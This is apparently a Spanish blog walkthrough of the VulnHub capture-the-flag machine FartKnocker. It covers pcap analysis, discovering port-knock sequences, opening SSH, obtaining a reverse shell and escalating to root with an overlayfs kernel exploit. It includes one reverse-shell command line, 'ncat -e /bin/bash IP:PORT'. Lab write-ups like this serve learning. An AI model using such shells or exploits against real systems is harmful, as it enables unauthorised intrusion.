Aprovechando que hoy han cortado el suministro de electricidad en la ciudad y todo está parado, vamos a jugar un poquito con el ordenador.

 

Hoy os traigo FartKnocker, inspirado en Beavis and Butt-Head. Me hacían gracia a mi de pequeño, todo el rato tirándose pedos, escupiendo y sacándose mocazos verdes. Jaja, eran muy absurdos.

 

Otra cosa, por introducirnos un poco en contexto, en todo el solucionario usare la palabra “pedo” en vez de “nmap”, no sé las veces que lo voy a usar. Pero por lo menos así no empiezo igual que siempre. Una vez dicho esto, podemos empezar.

 

Link: https://www.vulnhub.com/...

 

Pedo nos muestra un primer y en principio, único destino. 80 http.

 

Pues allá vamos. Entramos a su direccion http y nos encontramos con un mensaje y el enlace a un archivo .pcap

 

Abrimos el archivo con wireshark, y si nos fijamos bien, no hay ni rastro de ninguna conexión establecida, aunque eso no significa que no haya información.

 

Darse cuenta que en la captura estoy filtrando los ICMP para que se vea mas claro.

Observamos que el host 192.168.56.102 repite dos veces la secuencia 7000 8000 9000 tcp y luego uno al 8888 tcp. Son paquetes syn, que vuelven sin respuesta... no hay muchas mas opciones, tiene que ser un knock (Ya podían haber llamado a la máquina de otra manera también).

 

Me mola a mí la tecniquilla esta del knock, si algún día soy admin (y me pagan bien, claro está) lo usaré a tope. De echo investigando un poco encontré un documento la mar de interesante: An Analysis of Port Knocking and Single Packet Authorization.

 

¿Que teníamos por ahí entonces? Ah si, /burgerworld/. Ahora mismo solo puede ser una URL.

 

Igual que antes, otro archivo pcap... Buah! Comida para tiburones!

 

Reconozco que soy un ansioso, cuando pillo una captura siempre ordeno por tamaño de paquetes. A los gordos primero (eh! que nadie se me ofenda, yo pesaba dos quintales y medio esta mañana). Entonces: Follow    --->   TCP Stream.

 

Jaja. Que currao! Y un mensaje en alemán, que quizás no se ve bien el la imagen.

eins drei drei sieben        <--- 1 3 3 7

 

Mmm. Pues solo tengo el knock, porque pedo me sigue diciendo que está todo cerrado.

 

waste? No tengo ni idea de qué puede ser. Vamos a poner al máximo a nuestro amigo pedo. (Hice una promesa.)

 

Pues no tengo ni idea de lo que hay ahí detrás, pero me dá para leer /iamcornholio/, ok, pues hago lo mismo que antes, al navagedor!

 

Ah muy bien, un mensaje cifrado, con toda la pinta de base64 puesto que está en base64: Open up SSH: 8888 9999 7777 6666

 

¿Que será?, ufff!, quizás es una locura, pero voy a probar un knock con esa secuencia.

 

Siempre es bueno buscar los posibles banners de los servicios expuestos. En este caso hay oro, bueno, un user, pero por la cara!

 

Si queremos hacer login no vamos a entrar en un terminal, nos escupe. Lo que si nos deja es mandarle algún comando, que no es poco!

 

Una vez aquí no deberia ser dificil conseguir una shell. Hay múltiples maneras de hacerlo, unas más "discretas" que otras, pero como tampoco estamos en terreno hostil sino que estamos echando el rato, vamos a lo más comodo. Hosteo una reverse shell, la ejecutamos y pa'dentro.

 

Si señor, tambien se podria haber hecho con ncat -e /bin/bash IP:PORT ('ncat' y no 'nc'). Es igual, es caso es que estamos dentro.

 

Lo primero que vemos es un archivo en la carpeta personal de butthead: nachos

 

Y os juro que cuando lo leí pensé: "Obviamente si"... pero al final fue que no. Bueno, loguearme no, ser root si. xD

Mira que le dí vueltas eh. Llegué a encontrara otras dos capturas .pcap, pero la verdad es que no saqué nada en claro de ellas. Ya solo me quedaba o hacer diccionarios sobre webs de Beavis and Butt-Head + fuerza bruta con hydra, o tirar de exploits, y siendo un Ubuntu 14.04 con kernel 3.13, overlayfs de tirona.

 

Pues me quedo con las ganas de haber escalado de otra forma, pero no hay manera. Por lo tanto así se queda, medio tonto pero vivo.

 

Como siempre gracias al autor TopHatSet, y a vulnhub. Sois grandes!